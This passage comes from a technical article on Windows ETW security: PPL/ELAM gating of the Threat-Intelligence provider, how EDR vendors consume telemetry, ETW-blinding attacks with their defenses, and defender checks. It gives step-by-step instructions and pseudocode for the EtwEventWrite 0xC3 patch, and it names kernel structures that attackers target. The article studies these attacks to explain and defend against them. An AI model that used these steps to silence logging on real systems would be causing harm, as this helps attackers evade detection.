Windows 8.1 introduced the protected service concept specifically for antimalware engines. The motivation was simple: a malicious process running as administrator should not be able to inject code into the antimalware service or attach a debugger to it. The Microsoft Learn primary [@ms-protect-am] [@ms-protect-am] sets out the model:

"Windows 8.1 introduced a new concept of protected services to protect anti-malware services... In addition to the existing ELAM driver certification requirements, the driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries." -- [@ms-protect-am]

PPL is a process-protection level. A given process has a level on the PPL lattice; another process can open it for write or debug only if the requesting process's level is greater than or equal to the target's. Antimalware-PPL is a signer level on that lattice. The kernel admits a process to Antimalware-PPL when its image is signed with a certificate whose EKU includes 1.3.6.1.4.1.311.61.4.1 (Windows Antimalware) and whose certificate is enrolled in an ELAM driver's allow-list at boot.

A Windows process-protection model. Each process has a PPL level; another process may open it for write or debug only if the requestor is at an equal or higher level. Originally introduced for DRM, the lattice was extended in Windows 8.1 to host the Antimalware signer level for protecting antimalware services from administrative-rights attackers. A specific signer level on the PPL lattice. Reserved in Windows 8.1 for Microsoft Defender; opened to third-party EDR vendors via ELAM onboarding in the Windows 10 RS-era. Consumption of the `Microsoft-Windows-Threat-Intelligence` ETW provider is gated at the Antimalware signer level: an `EnableTraceEx2` call from a non-Antimalware-PPL caller against the EtwTi GUID returns `ERROR_ACCESS_DENIED` (the `EnableTraceEx2` [@ms-enabletraceex2] [@ms-enabletraceex2] page documents the error code for callers that lack the documented administrative groups; the per-provider PPL-signer-level check that triggers it for the EtwTi GUID specifically is described in the [@fluxsec-eti] prerequisite list).

Early Launch Antimalware

ELAM is a driver class that loads before any other non-Microsoft boot driver. The Microsoft Learn primary [@ms-elam] [@ms-elam] describes it:

"Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger... AM drivers are initialized first and allowed to control the initialization of subsequent boot drivers, potentially not initializing unknown boot drivers." -- [@ms-elam]

The boot sequence runs like this. Winload loads the ELAM driver as part of the early-boot path. The ELAM driver registers a callback via IoRegisterBootDriverCallback and gets to inspect each subsequent boot driver, returning a verdict (initialize / do not initialize / unknown) based on the certificate inventory it carries in its embedded resource section. The kernel honours that verdict. After boot drivers settle, the SCM launches the paired user-mode antimalware service with the LaunchProtected = SERVICE_LAUNCH_PROTECTED_ANTIMALWARE_LIGHT flag, and the kernel admits that service to Antimalware-PPL because its signing certificate matches an entry in the ELAM driver's allow-list.

A driver class that loads before any non-Microsoft boot driver. The ELAM driver registers a boot-driver callback to inspect subsequent drivers and an embedded-resource certificate inventory of permitted user-mode antimalware service signatures. Together with PPL, ELAM gates which user-mode antimalware services can pass the Antimalware-PPL admission check.

The 1709 onboarding

Microsoft Defender's MsMpEng.exe ran at the Antimalware signer level by default starting around the Windows 10 1709 timeframe (October 17, 2017), and the same release is widely cited in EDR-vendor documentation as the moment the Antimalware-PPL onboarding was extended to third-party EDR vendors. The Microsoft primary that pins the 1709 third-party onboarding date is not in the public ETW documentation; we treat the date as widely-cited rather than verified.

The dispositive practical evidence is the Trail of Bits 2023 walkthrough by Yarden Shafir [@trailofbits-shafir] [@trailofbits-shafir]. Shafir's WinDbg JS scripts walk the live _ETW_REALTIME_CONSUMER data structures of a running Windows host and print:

"Process CSFalconService.exe with ID 0x1e54 has handle 0x760 to Logger ID 3" -- [@trailofbits-shafir]

That is CrowdStrike's user-mode service, holding a real-time consumer handle to an EtwTi logger session. By 2023 the third-party Antimalware-PPL story is operationally complete.

sequenceDiagram participant BL as Winload (boot) participant EL as ELAM Driver participant SCM as Service Control Manager participant SVC as EDR Service participant K as Kernel ETW BL->>EL: Load ELAM driver (early boot) EL->>EL: Register IoRegisterBootDriverCallback then read embedded cert inventory Note over EL: ELAM gates subsequent boot drivers SCM->>SVC: Start EDR service with PROTECTED_ANTIMALWARE_LIGHT flag K->>SVC: Verify signature against ELAM allow-list K-->>SVC: Admit to Antimalware-PPL SVC->>K: EnableTraceEx2(session, EtwTi GUID, ...) K->>K: Check caller signer level ge Antimalware K-->>SVC: SUCCESS Note over SVC,K: Non-PPL caller would receive ERROR_ACCESS_DENIED here

Why this gate matters for the section 1 hook

The asymmetry that defines the entire generation is one sentence in the fluxsec.red walkthrough [@fluxsec-eti] [@fluxsec-eti]:

We cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself. To do so, you'd require kernelmode execution and then to patch out those signals so no ETW signals are emitted. -- [@fluxsec-eti]

That is the answer to the puzzle the section 1 hook posed. The Adam Chester 2020 patch operates on a user-mode trampoline in the calling process. ntdll!EtwEventWrite is a stub that calls down through NtTraceEvent into the kernel; rewriting its first byte to 0xC3 short-circuits the user-mode entry path and the calling process emits no events through that stub. But EtwTi does not fire from the user-mode entry path. EtwTi fires from inside the kernel implementation of NtAllocateVirtualMemory and friends, after the syscall has crossed the boundary, on a path the user-mode patcher cannot reach without first achieving kernel execution.

Key idea: EtwTi is the only ETW provider in the catalogue whose producer fires from the kernel side of the syscall path -- and that is exactly why a user-mode patch in the calling process cannot silence it. The PPL+ELAM gate that controls consumer admission is paired with a producer location that no in-process attacker can reach.

The 2017 PPL+ELAM gate was a deliberate structural defense against the patch class that was only fully publicised three years later. By the time Chester wrote his March 2020 post, the load-bearing security signal was already structurally out of reach of his technique.

The combination of PPL and ELAM is not an arbitrary defense-in-depth stack. PPL gates *consumer identity* at signer level: only a binary signed with the Antimalware EKU and enrolled in an ELAM allow-list can subscribe. ELAM gates *load order*: the gate is set during early boot, before any code an attacker could load gets a chance to interfere. The signer-level check is hard because forging the signature requires breaking Microsoft's PKI; the load-order check is hard because subverting it requires compromising the boot path, which Secure Boot and the Vulnerable Driver Blocklist exist to defend.

That is the gate. Now we walk the consumers that pass through it.

10. Six vendors, three spectra: a map of the EDR consumer architecture

Defender, CrowdStrike, SentinelOne, Sysmon, Wazuh, Elastic Defend. They look interchangeable on a vendor comparison sheet. They are not, and the differences are entirely about which substrates each one consumes.

There are three axes that distinguish them.

Axis 1: kernel callbacks vs ETW

Some EDRs consume process-creation events through ETW (subscribing to Microsoft-Windows-Kernel-Process from a SYSTEM-privileged user-mode service). Others register kernel callbacks directly through PsSetCreateProcessNotifyRoutineEx [@ms-pssetprocnotify] [@ms-pssetprocnotify] and PsSetCreateThreadNotifyRoutine [@ms-pssetthreadnotify] [@ms-pssetthreadnotify] from a kernel driver they ship.

The trade-off is sharp. Kernel callbacks are synchronous: the kernel calls into the driver before the operation completes, the driver runs at PASSIVE_LEVEL in the originating thread context with normal kernel APCs disabled, and the driver can deny the operation by writing a non-success status to CreationStatus. ETW is asynchronous: the event is emitted from the producer's hot path, drained from a per-CPU buffer by the writer thread, and delivered to the consumer's callback at some later point. ETW cannot deny anything; it can only observe.

The `PsSetCreate*NotifyRoutine` family of kernel APIs. A driver calls `PsSetCreateProcessNotifyRoutineEx` (process create/exit), `PsSetCreateThreadNotifyRoutine` (thread create/exit), or `PsSetLoadImageNotifyRoutine` (image load) at boot to register a callback. The kernel invokes the callback synchronously, in the originating thread context at PASSIVE_LEVEL with normal kernel APCs disabled. The `Ex` variant of the process callback receives a `CreationStatus` field the driver can write to deny the operation.

CrowdStrike, SentinelOne, Sysmon, and Elastic Defend ship kernel drivers and use callbacks for the latency-critical hot path. Defender uses both -- callbacks from WdFilter.sys and ETW consumption from MsMpEng.exe -- because as the in-box engine it has the institutional position to do so. Wazuh ships no kernel driver; it consumes ETW exclusively via SilkETW-class wrappers, which makes it less invasive but unable to deny.

Axis 2: PPL adoption

Defender (MsMpEng.exe and MsMpEngCP.exe) runs at Antimalware-PPL by default. CrowdStrike's CSFalconService.exe runs at Antimalware-PPL, demonstrably [@trailofbits-shafir] [@trailofbits-shafir]. SentinelOne's SentinelAgent.exe is widely reported to run at Antimalware-PPL via vendor documentation, although it does not appear in the Trail of Bits sample debugger output. Sysmon runs as a protected process but not at the Antimalware signer level [@ms-sysmon] [@ms-sysmon] -- the Microsoft Learn page states "The service runs as a protected process, thus disallowing a wide range of user mode interactions" without naming Antimalware specifically.

Wazuh and Elastic Defend's user-mode services run as standard SYSTEM-privileged services without PPL.

Axis 3: EtwTi consumption

This axis is determined by axis 2. Defender consumes EtwTi by design -- it is the in-box reason EtwTi exists. CrowdStrike and SentinelOne consume EtwTi (the Trail of Bits debugger output is the practical demonstration). Sysmon does not consume EtwTi: it is not Antimalware-PPL, so its EnableTraceEx2 calls against the EtwTi GUID would receive ERROR_ACCESS_DENIED. Sysmon relies on its own SysmonDrv.sys callbacks for the in-memory threat surface that EtwTi covers for the others. Wazuh and Elastic Defend do not consume EtwTi for the same reason; Elastic Defend ships its own kernel driver to compensate [@elastic-doubling-down] [@elastic-doubling-down], using Microsoft-blessed kernel-callback paths for memory events.

Vendor	Process surface	PPL level	EtwTi?	Primary source
Microsoft Defender	Driver callbacks (`WdFilter.sys`) + ETW (`MsMpEng.exe`)	Antimalware-PPL	Yes	[@ms-protect-am]
CrowdStrike Falcon	Driver callbacks + ETW	Antimalware-PPL	Yes ([@trailofbits-shafir] live evidence)	[@trailofbits-shafir]
SentinelOne	Driver callbacks + ETW	Antimalware-PPL	Widely reported	-- (vendor docs; SentinelAgent.exe not in [@trailofbits-shafir] sample)
Sysmon	`SysmonDrv.sys` callbacks; publishes via own ETW provider	Protected (not Antimalware)	No	[@ms-sysmon]
Wazuh	ETW only (SilkETW-class)	Standard SYSTEM	No	--
Elastic Defend	Own kernel driver + ETW	Standard SYSTEM	No	[@elastic-doubling-down]

Sysmon is worth singling out as the canonical callback-then-publish reference architecture. Its kernel driver registers PsSetCreate*NotifyRoutine callbacks; its user-mode service consumes the events the driver delivers; and the service then publishes them via its own Microsoft-Windows-Sysmon ETW provider for any downstream consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) to read. The result is that Sysmon's events are universally consumable -- which is why Wazuh and Splunk both ship Sysmon configurations as their default kernel-event source.

Sysmon's design choice is the reference architecture for the callback-then-publish pattern, even though Sysmon is not itself an Antimalware-PPL EDR. By publishing through its own ETW provider rather than writing to a private channel, Sysmon makes its events consumable by any downstream pipeline. Wazuh and the Splunk Universal Forwarder can both ingest Sysmon events without any custom integration work. This is why Sysmon, despite being free, is the de facto kernel-event source for the open-source SIEM world. flowchart LR K[Kernel callbacks
synchronous, can deny] --- L1[Sysmon driver] K --- L2[CrowdStrike driver] K --- L3[SentinelOne driver] K --- L4[Elastic driver] K --- L5[Defender WdFilter.sys] M[ETW providers
asynchronous, observe-only
up to 8 consumers per provider] --- M1[Defender MsMpEng] M --- M2[CrowdStrike service] M --- M3[SentinelOne service] M --- M4[Sysmon service] M --- M5[Wazuh ETW reader] M --- M6[Elastic Defend service] K -.latency-vs-coupling axis.-> M

The CrowdStrike July 2024 channel-file outage was a kernel-driver brittleness story, not an ETW story. The Falcon kernel driver's content-update parser dereferenced an out-of-bounds pointer when processing a channel file whose Rapid Response Content template had 21 input fields while the sensor's Content Interpreter expected only 20, triggering an out-of-bounds array read, BSOD-ing roughly 8.5 million Windows hosts [@ms-crowdstrike-2024][@crowdstrike-rca-2024]. That story belongs to the App Identity in Windows article [@paragmali-com-app-ide] in this series; it is mentioned here only to mark that the cost of the synchronous-kernel-driver path is a higher blast radius when the driver itself is buggy.

A note on Defender's cloud schema. The events that surface in Microsoft Defender for Endpoint's hunting tables -- DeviceProcessEvents, DeviceFileEvents, DeviceNetworkEvents, DeviceImageLoadEvents, DeviceRegistryEvents -- are the cloud-side abstraction over the kernel and ETW telemetry the Defender sensor collects locally. The full schema mapping from ETW provider to cloud column is out of scope here, but the substrate is the same.

Six vendors, three axes, one substrate. Now we walk the attack tradition that the substrate has to survive.

11. The attack tradition: five generations of trying to blind ETW

Every generation of ETW has been attacked. Some attacks broke a single provider; some broke every user-mode provider on a host; one would, if it worked at scale, break Defender. The defense story is on the same five-generation timeline.

Gen 1 (2014-2018): autologger registry tampering

The dispositive taxonomy is Matt Graeber and Lee Christensen's December 24, 2018 Palantir CIRT post [@palantir-tampering-wayback] [@palantir-tampering-wayback], preserved in the Wayback Machine because the direct Medium URL has since returned HTTP 403 to non-browser fetchers. The opening framing is verbatim:

"Event Tracing for Windows (ETW) is the mechanism Windows uses to trace and log system events. Attackers often clear event logs to cover their tracks. Though the act of clearing an event log itself generates an event, attackers who know ETW well may take advantage of tampering opportunities to cease the flow of logging temporarily or even permanently, without generating any event log entries in the process." -- [@palantir-tampering-wayback]

Graeber and Christensen split the technique into two classes. Persistent tampering writes to the autologger registry path described in section 6, disabling a session before it ever starts at next boot; the events of interest are never captured because the session is never running. Ephemeral tampering targets a live session: stopping the session via ControlTrace, removing a provider from a session via EnableTraceEx2(EVENT_CONTROL_CODE_DISABLE_PROVIDER, ...), or directly clearing the session's buffers.

The defense is direct: monitor the autologger registry surface. Sysmon Event ID 13 [@ms-sysmon] surfaces registry value-set events in HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\; a SOC playbook that alerts on any unexpected write to that subtree catches the persistent class of attack reliably. Matt Graeber's authorship is cross-confirmed by the palantir/exploitguard repository [@gh-palantir-exploitguard] [@gh-palantir-exploitguard], which credits him as the lead researcher on the ETW work.

Gen 2 (2020): user-mode `EtwEventWrite` 0xC3 RET patch

The technique that made ETW patching a household tradecraft term is Adam Chester's "Hiding your .NET - ETW", March 17, 2020 [@xpn-hiding-dotnet] [@xpn-hiding-dotnet]. The mechanic is one byte:

Locate ntdll!EtwEventWrite (or in modern variants ntdll!NtTraceEvent) in the calling process's memory.
Use VirtualProtect to make the page writable.
Write the byte 0xC3 over the function's first byte.
Restore the page protection.

0xC3 is the near-return opcode [@felixcloutier-ret] [@felixcloutier-ret]: "C3 RET ZO Valid Valid Near return to calling procedure." Any caller into the function falls straight back to its return address before producing a single event. The calling process now silently fails to emit any user-mode ETW events for any provider that funnels through the patched stub -- including Microsoft-Windows-DotNETRuntime.

The technique has been re-implemented in every language that can call VirtualProtect. The fluxsec.red Rust port [@fluxsec-etw-patching] [@fluxsec-etw-patching] explains the modern variant verbatim:

"When a ETW Provider sends a notification, it will eventually reach into ntdll.dll for the function NtTraceEvent... we can simply patch the function address to return straight from byte 0. The opcode for a ret is C3, so we can swap out the opcode 4C with C3 to immediately return out of the stub." -- [@fluxsec-etw-patching]

Here is the structure of the patch in TypeScript pseudocode -- not actually runnable Win32, but mirroring exactly what a Windows binary would do:

{` // Pseudocode: silence user-mode ETW for the calling process. // This silences only the calling process and only user-mode providers // that funnel through the patched stub.

// 1. Resolve the address of ntdll!EtwEventWrite in this process. const ntdll = getModuleHandle("ntdll.dll"); const fn = getProcAddress(ntdll, "EtwEventWrite");

// 2. Make the function's first page writable. const PAGE_EXECUTE_READWRITE = 0x40; let oldProtect = 0; virtualProtect(fn, 1, PAGE_EXECUTE_READWRITE, /* out */ ref(oldProtect));

// 3. Write 0xC3 (RET) over the first byte. Caller now returns immediately. writeByte(fn, 0xC3);

// 4. Restore original page protection. virtualProtect(fn, 1, oldProtect, /* out */ ref(oldProtect));

// Limits: // - Silences only this process. // - Silences only providers whose emit path funnels through this stub. // - Cannot silence kernel-emitted providers like Microsoft-Windows-Threat-Intelligence. `}

Note: The patch operates on the calling process's user-mode trampoline. Other processes on the host are unaffected; their ETW emissions continue normally. Kernel-emitted providers like Microsoft-Windows-Threat-Intelligence are unaffected even in the patched process; they fire from the kernel side of the syscall path, after control has crossed the user/kernel boundary, on a code path the user-mode patcher cannot reach without first achieving kernel execution.

Gen 3 (2021-2023): kernel-mode primitives

If a user-mode patch cannot reach EtwTi, can a kernel-mode patch? Yes -- but the attacker first needs kernel execution. The most common path is BYOVD [@paragmali-com-in-windows]: load a signed but vulnerable driver and use its primitive to read or write kernel memory. Once you can write kernel memory you can target ETW's internal data structures directly.

Binarly's Black Hat Europe 2021 talk [@binarly-edr] [@binarly-edr] documents the surface verbatim:

Many ways to disable ETW logging are publicly available from passing a TRUE boolean parameter into a `nt!EtwpStopTrace` function to finding an ETW specific structure and dynamically modifying it or patching `ntdll!ETWEventWrite` or `advapi32!EventWrite` to return immediately thus stopping the user-mode loggers. -- [@binarly-edr]

The kernel-side primitives Binarly enumerates target the _ETW_GUID_ENTRY structure for a provider, the EtwpRegistration linked list of registered providers, and the EtwpEventTracingProhibited flag the kernel checks before emitting events. Yarden Shafir's 2023 Trail of Bits walkthrough [@trailofbits-shafir] [@trailofbits-shafir] provides the contemporary kernel-side data structure walk through _ETW_REALTIME_CONSUMER and _ETW_SILODRIVERSTATE, and notes:

"Most recently, the Lazarus Group bypassed EDR detection by disabling ETW providers" -- [@trailofbits-shafir]

The architectural-level treatment is well-documented; the specific kernel offsets that change between Windows builds are a moving target. We treat the technique class as well-established and the per-build offset details as out of scope.

Defense Gen 1 (2017): Antimalware-PPL + ELAM gate on EtwTi

Section 9 covered this in detail. The point to record here, in the attack-tradition timeline, is that the Antimalware-PPL gate predates the Adam Chester 2020 user-mode patch by three years. Microsoft did not respond to Chester's post; they had already put the load-bearing security signal structurally out of reach of any user-mode patch in the calling process. The user-mode patch class is generic against Microsoft-Windows-DotNETRuntime and the rest of the user-mode catalogue; it is structurally impotent against Microsoft-Windows-Threat-Intelligence.

Defense Gen 2 (2022): Vulnerable Driver Blocklist on by default

The kernel-mode primitive class needs a kernel write. Without a vulnerability in the EDR's kernel driver, the realistic path is BYOVD: load a third-party signed driver that exposes a memory-write primitive. The structural defense is Microsoft's Vulnerable Driver Blocklist [@ms-vdb] [@ms-vdb]:

Since the Windows 11 2022 update, the vulnerable driver blocklist is enabled by default for all devices, and can be turned on or off via the Windows Security app... the vulnerable driver blocklist is also enforced when either memory integrity, also known as hypervisor-protected code integrity (HVCI), Smart App Control, or S mode is active... The blocklist is updated quarterly. In addition, blocklist updates are delivered through the monthly Windows updates as part of the standard servicing process. -- [@ms-vdb]

The blocklist enumerates known-vulnerable signed drivers by hash; the kernel refuses to load anything on the list. On a Windows 11 22H2-or-later host with the default settings, the BYOVD primitive against most known-vulnerable drivers is closed. With HVCI on, the closure is enforced even against attackers who would otherwise try to load drivers via legacy paths. The empirical bound is the LOLDrivers project's catalogue of known-vulnerable drivers; the blocklist tracks public discovery with a lag of approximately one quarter, which is the residual window an attacker can exploit before a freshly disclosed driver is added.

The attack pattern of loading a known-vulnerable but signed driver to obtain a kernel-mode primitive (memory read, memory write, or arbitrary code execution). Used in real-world EDR-blinding attacks, including by the Lazarus Group as cited in Trail of Bits' 2023 ETW walk [@trailofbits-shafir]. The Microsoft-maintained blocklist of known-vulnerable signed drivers, by hash. Enabled by default on Windows 11 22H2 and later. Enforced more strictly when HVCI, Smart App Control, or S mode is active. Updated quarterly per the Microsoft Learn primary [@ms-vdb].

The LOLDrivers project [@loldrivers] [@loldrivers] is the empirical anchor for the BYOVD lag story. It catalogues known-vulnerable signed drivers as a community resource; the Microsoft blocklist updates quarterly, but blocklist updates are also delivered through monthly Windows servicing, so a freshly-disclosed driver can live in an exploitation window of as short as ~1 month (via Patch Tuesday) or up to a full quarter before its hash is added.

flowchart LR subgraph Attacks A1["Gen 1 2014-2018: Autologger registry tampering -- Palantir CIRT taxonomy"] A2["Gen 2 2020: EtwEventWrite 0xC3 RET -- Adam Chester"] A3["Gen 3 2021-2023: Kernel _ETW_GUID_ENTRY -- EtwpRegistration EtwpStopTrace via BYOVD"] end subgraph Defenses D1["Sysmon Event ID 13 -- monitor Autologger subtree"] D2["Antimalware-PPL plus ELAM -- gate on EtwTi 2017"] D3["Vulnerable Driver Blocklist -- default-on Win11 22H2 plus HVCI"] end A1 --> D1 A2 --> D2 A3 --> D3

The 2026 picture

User-mode patching cannot reach the kernel-mode provider that EDR cares about. The BYOVD primitive that could reach it is structurally narrowed by default on supported hardware. The remaining gap is the long tail of newly-disclosed vulnerable drivers between disclosure and blocklist update, plus any custom kernel zero-day an attacker discovers in an EDR's own driver. Both are real, both are exploited in the wild, neither is the universally-applicable evasion the 2020-era user-mode patch class was.

That is the operational story. But ETW has structural limits even when no attacker is patching anything.

12. Theoretical limits: what ETW cannot see, even with every defence engaged

Even on a perfectly-configured Windows 11 box -- HVCI [@paragmali-com-in-windows] on, Vulnerable Driver Blocklist on, Antimalware-PPL Defender consuming EtwTi, third-party EDR ELAM-onboarded -- there are events ETW does not emit. Some are observed too late. Some are not observed at all.

There are three structural ceilings.

Pre-ETW kernel paths

The Global Logger session is one of the earliest things to come up at boot, but it is not the first. Some early-init driver paths run before any ETW session exists; they cannot be traced via ETW. Measured Boot is the discipline that records this prefix into TPM PCRs, with attestation handled by the platform integrity layer rather than by ETW. The implication for EDR is that any malicious code executing during early boot, before the Global Logger session is up, is invisible to ETW.

Incomplete EtwTi syscall coverage

The 10 KERNEL_THREATINT_TASK_* task IDs are the public surface. The underlying syscall set the kernel actually instruments is not exhaustively documented. The fluxsec.red inventory [@fluxsec-eti] [@fluxsec-eti] is the public surface, not the private one. Some syscalls are clearly covered (NtAllocateVirtualMemory for cross-process allocation surfaces as KERNEL_THREATINT_TASK_ALLOCVM); some have partial coverage (MAPVIEW_LOCAL and MAPVIEW_REMOTE keywords cover some but not all of the section-mapping primitive set across NtCreateSection, NtMapViewOfSection, NtMapViewOfSectionEx, image-section vs file-section variants); some are not enumerated at all in the public manifest. Process-hollowing primitives that combine NtUnmapViewOfSection and NtMapViewOfSection may be partially covered depending on which path the attacker takes.

The async-flush gap

ETW's per-CPU ring buffer is asynchronous. If a process allocates RWX memory, writes shellcode, executes it, and returns within one writer-thread flush interval, the event is recorded but the attacker's payload has already executed. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. The Microsoft Learn primary on About Event Tracing [@ms-about-etw] [@ms-about-etw] is explicit that events can be lost:

"Events can be lost if any of the following conditions occur ... The total event size is greater than 64K ... The disk is too slow to keep up with the rate at which events are being generated. ... For real-time logging, the real-time consumer is not consuming events fast enough." -- [@ms-about-etw]

No ETW-only EDR can prevent a syscall whose payload completes inside one writer flush. EDRs that ship a kernel driver and register synchronous callbacks (CrowdStrike, SentinelOne, Sysmon, Elastic Defend) can deny operations through the PsSetCreateProcessNotifyRoutineEx [@ms-pssetprocnotify] [@ms-pssetprocnotify] CreationStatus field; ETW-only EDRs cannot. ETW is observation, not enforcement.

Key idea: ETW is observation, not enforcement. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. Sub-microsecond payloads execute before the writer thread flushes; the layered defense stack of 2026 is an empirical bar, not a theoretical guarantee.

The VBS-backed code-integrity enforcement for kernel-mode code on Windows. With HVCI enabled, the hypervisor enforces that only signed kernel pages can execute. Closes the attack class that loads unsigned drivers; combined with the Vulnerable Driver Blocklist it closes most of the realistic BYOVD primitive surface as well.

The "events can be lost" enumeration in [@ms-about-etw] is the dispositive Microsoft acknowledgement of ETW's lossy substrate. SOC playbooks should treat ETW telemetry as best-effort, not as a guaranteed audit trail. Forensic claims that depend on completeness need an independent corroborating source.

Note: A detection-only EDR can alert on a malicious operation, but only after the operation has happened. By the time the SOC sees the alert, the syscall has completed, the shellcode has executed, the credentials have been stolen. This is why the kernel-callback path (with its ability to deny via CreationStatus) coexists with ETW even though ETW is more flexible: a SOC playbook needs both the speed of denial and the breadth of observation.

The 2026 layered stack -- Antimalware-PPL + EtwTi + HVCI + VBL -- raises the empirical bar enormously. It does not close the architectural gap. Sub-microsecond payloads still execute before the writer thread flushes. The BYOVD primitive on a non-HVCI box still defeats the kernel-callback layer. There are still problems the substrate cannot solve in principle.

Those are the limits we can describe. The next section is about the limits we cannot yet measure.

13. Open problems: keyword drift, secure kernel ETW, and the BYOVD arms race

The 2026 state of the art has five active open problems. Each has a partial workaround; none has a complete solution.

1. EtwTi keyword inventory drift across builds

Microsoft has not published a complete, current Microsoft-Windows-Threat-Intelligence keyword inventory. The community-maintained references -- the jdu2600 cross-build inventory [@gh-jdu2600] [@gh-jdu2600] and the repnz manifest archive [@gh-repnz] [@gh-repnz] -- are partial coverage and lag Microsoft's quarterly servicing cadence. EDR vendors that hard-code keyword bitmasks against an old build can silently miss events on newer builds because the keyword definitions have shifted underneath them. Detection engineers writing rules against KERNEL_THREATINT_TASK_* IDs that move between builds can get false negatives.

There are three plausible reasons, and Microsoft has not stated which (or which combination) is operative. *Operational secrecy*: a complete keyword inventory tells attackers exactly which syscall paths are observed and which are not, narrowing the search for evasion paths. *Documentation cost*: the inventory shifts every build, and maintaining a synchronised public reference is engineering work without an obvious internal champion. *Deliberate moving target*: keeping the public surface incomplete forces attackers to reverse-engineer per build, raising the cost of stable evasion. The community references partially defeat all three rationales; the absence remains.

2. Secure ETW (the `EtwSi*` family)

Windows VBS Trustlets run in the Secure Kernel (VTL1), insulated from the normal-world kernel (VTL0) by the hypervisor. The Secure Kernel exposes its own ETW family for VTL1 components; this is enumerated in fragments in Alex Ionescu's BlackHat 2015 deck on the Secure Kernel and in subsequent BlueHatIL talks. There is no public consumer-facing primary on EtwSi* in 2026. Cross-link: this article's companion piece on VBS Trustlets [@paragmali-vbs-trustlets] [@paragmali-vbs-trustlets] covers the producer side of the story.

3. Forensic soundness of ETW telemetry

ETW is lossy by design (per the [@ms-about-etw] enumeration). Whether ETW-derived telemetry is forensically sound -- chain-of-custody complete, lossless under load, attestable as untampered between event emission and SIEM ingestion -- is an open question. Courts have not ruled. The current best partial result is to treat ETW as supporting evidence and require independent corroboration (file-system snapshots, network captures, OS state captures) for any claim that depends on completeness. Sysmon's Event ID 16 (Sysmon configuration changed) [@ms-sysmon] and the autologger registry write events on HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ are useful integrity signals: an attacker who silenced ETW typically leaves a footprint here.

4. The BYOVD arms race

The Vulnerable Driver Blocklist [@ms-vdb] [@ms-vdb] is hash-based and updated quarterly. The LOLDrivers project [@loldrivers] [@loldrivers] documents the public catalogue of known-vulnerable signed drivers. The gap between disclosure and blocklist update--as short as ~1 month via Patch Tuesday or up to a full quarter--is the residual exploitation window. The deeper structural issue is that the blocklist is hash-based; an attacker who finds a new vulnerability in a previously-trusted signed driver enjoys a fresh window every quarter. Closing this gap requires either a different trust model (allow-listing of known-good drivers, as Smart App Control does for executables) or behavioural detection of suspicious driver loads. Both are active areas of work.

5. Cross-process section-mapping coverage

EtwTi's KERNEL_THREATINT_TASK_MAPVIEW covers some but not all section-mapping primitives. The public fluxsec.red [@fluxsec-eti] inventory lists MAPVIEW_LOCAL and MAPVIEW_REMOTE keywords, but the underlying syscall set (NtMapViewOfSection, NtMapViewOfSectionEx, NtCreateSection, image-section vs file-section variants) is not exhaustively documented. Detection engineers who depend on full coverage of cross-process section mapping are working from an incomplete map.

What would a v2 ETW look like?

A theoretical ideal: synchronous kernel-emitted events on every security-relevant syscall, with the consumer running in VTL1 (Secure Kernel) so even a kernel-mode attacker in VTL0 cannot tamper with the consumer. The EtwSi* family is the partial realisation. The full ideal is incompatible with x64 syscall performance: synchronous notification on every syscall would dominate the cost of the syscall itself. The pragmatic answer Microsoft has been building toward is selective synchronous notification (the kernel notify routines for high-value control points) layered with broad asynchronous observation (ETW for everything else), with the most security-critical of the broad observations promoted to PPL/ELAM-gated kernel-emitted producers (EtwTi). Two decades of layering, no single architectural endpoint.For the producer side of the Secure Kernel ETW story (EtwSi*), see this article's companion piece on VBS Trustlets [@paragmali-vbs-trustlets] [@paragmali-vbs-trustlets] in the same series. The Trustlet-side architecture is a separate topic large enough to need its own walkthrough.

Open problems are interesting but they are not actionable. The next section is about what an engineer can do on Monday morning.

14. Practical guide: five things to do Monday morning

You have read 12,000 words about ETW. Here are five concrete checks an engineer can run on a Windows host this morning.

Note: logman query providers enumerates every registered provider on the host. Cross-reference the output against the section 8 catalogue and flag any security-relevant provider your EDR is not consuming. Pay specific attention to Microsoft-Antimalware-Scan-Interface, Microsoft-Windows-PowerShell, Microsoft-Windows-DotNETRuntime, and Microsoft-Windows-Sysmon if Sysmon is installed. Missing coverage of any of these on a host you are responsible for is a detection-coverage gap, not a configuration issue.

Note: Run wevtutil gp Microsoft-Windows-Threat-Intelligence to confirm the provider is registered and inspect its keyword definitions. Then check whether your EDR is actually a consumer: walk the live-debugger handle enumeration in Yarden Shafir's Trail of Bits post [@trailofbits-shafir] [@trailofbits-shafir] (the WinDbg JS scripts are linked from the post). If your EDR is supposed to be ELAM-onboarded but does not appear in the consumer enumeration for an EtwTi logger session, your installation may have lost the gate. This is the difference between a configured EDR and a functional EDR.

Note: Enumerate HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ for unauthorised session entries. Per the Palantir CIRT taxonomy [@palantir-tampering-wayback] [@palantir-tampering-wayback], this is the persistent-tampering surface. A baseline audit should produce a known list of expected sessions (Defender, your EDR, Sysmon if installed, the standard Windows diagnostic listeners). Any subkey not on the baseline list is an investigation candidate. Sysmon Event ID 13 (registry value set) [@ms-sysmon] on this subtree is a high-signal alert in any SIEM.

Note: Run Get-CimInstance Win32_DeviceGuard | Select-Object SecurityServicesConfigured, SecurityServicesRunning, VirtualizationBasedSecurityStatus to expose whether HVCI and the Vulnerable Driver Blocklist are active. Per the Microsoft Learn primary [@ms-vdb] [@ms-vdb], the BYOVD ceiling is your kernel-tampering integrity guarantee. If VBS is Off on a managed endpoint, your detection coverage is structurally weaker than it should be on supported hardware. Treat it as a hardening item, not a nice-to-have.

Note: Write a hunting query for the pattern: "process X registers as ETW consumer for Microsoft-Windows-Threat-Intelligence and X is not on the EDR allow-list." The provider's PPL+ELAM gate makes this a high-signal alert: only a signed Antimalware-PPL service can pass the gate, so an unexpected process holding an EtwConsumer handle to the TI logger ID is either a misconfigured tool, a legitimate research session you forgot about, or an attacker chain that has acquired Antimalware-PPL trust on your fleet. The first two are quick to triage; the third is an incident.

The structure of the check in pseudocode -- mirroring the WinDbg JS approach in [@trailofbits-shafir]:

{` // Pseudocode: inventory providers and identify EtwTi consumers.

